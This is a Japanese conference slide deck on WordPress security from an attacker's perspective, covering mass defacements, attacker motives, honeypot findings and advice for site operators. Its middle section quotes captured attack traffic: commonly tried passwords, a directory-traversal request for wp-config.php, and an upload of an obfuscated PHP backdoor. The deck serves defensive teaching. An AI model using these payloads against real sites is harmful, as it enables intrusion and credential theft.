攻撃者からみたWordPressセキュリティ

攻撃者からみたWordPressセキュリティ

@ym405nm

さくらのビアバッシュ in 元町 D.E.P.

2015/03/19加筆修正 : 2015/03/20

目次

•現状

•攻撃者を勝手にプロファイリング

•運用者の対策

•まとめ

•おまけ？

現状

現状

• 2013年9月ロリポップの WordPress が一斉に改ざんされる

• 約8,000件のサイトが被害に

• サイト名が「Hacked by Krad Xin」等に改ざん

現状

• 2015年3月複数のサイトが改ざん

※ タイポ修正ｗ

http://www3.nhk.or.jp/news/html/20150311/k10010011751000.html

攻撃者を勝手にプロファイリング

誰がやってるのか？

• ハクティビスト• 政治的主張など、自分たちの主張を通すためにサイトを改ざんする

• 改ざんしたものを目立つようにアピールする

• マルウェア配布者• 難読化したスクリプトなどを仕込み訪問者にマルウェア感染させる

• 標的型攻撃者グループ• 使用するマルウェアのホスティングとして使用する

• C&Cサーバとして使用する

なぜ攻撃者がWordPressを狙うのか

• 圧倒的なユーザ数

• 行き届かないユーザ管理• 100人以上の編集者を抱えるサイト

• 編集者、管理者の面識がほとんどないサイト

• サードパーティ製ソフトウェアの普及• テーマやプラグイン

• セキュリティレベルはそれぞれの開発者に依存する

どのように狙われているのか

• 攻撃者は弱そうな WordPress を狙っている• wp-content?

• wp-admin?

• 脆弱なソフトウェアを使用しているサイトを探す• メーリングリスト

• 脆弱性売買サイト※ただし WordPress 関連の脆弱性は無料で配布されていることが多い

データを集めてみた

どのように狙われているのか

10

攻撃者

WP WP WP

BOT

サイトとか

Proxy Proxy Proxy ログ解析

投稿

収集

攻撃/スキャン

送信

こんなサイトです

こういうふうに攻撃してくるゾ

• アカウントクラッキング

• wp-config.php 情報の窃取

• ファイルアップロード


試行パスワード回数[server-name]123456 96

[server-name]123 49

[server-name][server-name] 48

[server-name]000000 48

[server-name]111 48





[server-name]123abc 48

[server-name]222 48


[server-name]333 48

[server-name]444 48

[server-name]555 48


[server-name]666 48


※ 2014年3月～5月計測傾向は期間によって若干異なります


POST /wp-content/themes/(THEME)/dl-skin.php HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux amd64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36Host: serverAccept-Encoding: gzipReferer: http://server/wp-content/themes/ (THEME) /dl-skin.phpAccept-Charset: utf-8,windows-1251;q=0.7,*;q=0.6Accept-Language: en-us,en;q=0.8Keep-Alive: 300Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.4

Content-Length: 60Content-Type: application/x-www-form-urlencoded

( PARAM )=..%2F..%2F..%2F..%2F..%2Fwp-config.php

ディレクトリトラバーサルの脆弱性を使用してwp-config.php の内容を読み取ろうとしている


Content-Disposition: form-data; name="Filedata"; filename="ifire.php"Content-Type: text/plain

<?phpeval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX5FBkRxZn0f6q3Gcs+2Ys/abIVOPpfXmRTXvz5R4hjYd08eetcBFr0pQjoAYzFmIynUXP1twBDkLIVp9ku+c7Gx5lyEF*******sO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ=="))); ?>

既知のファイルアップロード機能に認証がない脆弱性を使用してPHPファイルをアップロードしようとしている

アップロードされたファイルはバックドア（攻撃者専用の裏口）として動作する

運用者の対策

運用者の対策

• アカウントの管理をしっかりする• パスワードは強度なものにする

• テーマ / プラグインの選定をする• メンテナンス頻度

• 脆弱性情報への対応頻度

• 不要なものは使用しない

• セキュリティ拡張機能やセキュリティアプライアンスの導入を検討する• セキュリティ関連のプラグインに脆弱性があることも…

運用者の対策

• あわせて対策したい• サーバの選定

• ログの確認（ログイン履歴、アクセスログ）

• 脆弱性情報の収集

まとめ

まとめ

• 今後もWordPressに対する攻撃は減らない

• 攻撃者は既知のテーマ / プラグインの脆弱性を使用することが多い

• アカウントの管理や、テーマ / プラグインの管理をしっかりとする

安全なWordPressライフを！

ご清聴ありがとうございました

• Contact

Mail : [email protected]

Twitter : ym405nm

Facebook : facebook.com/ym405nm

Engineering

攻撃者からみたWordPressセキュリティ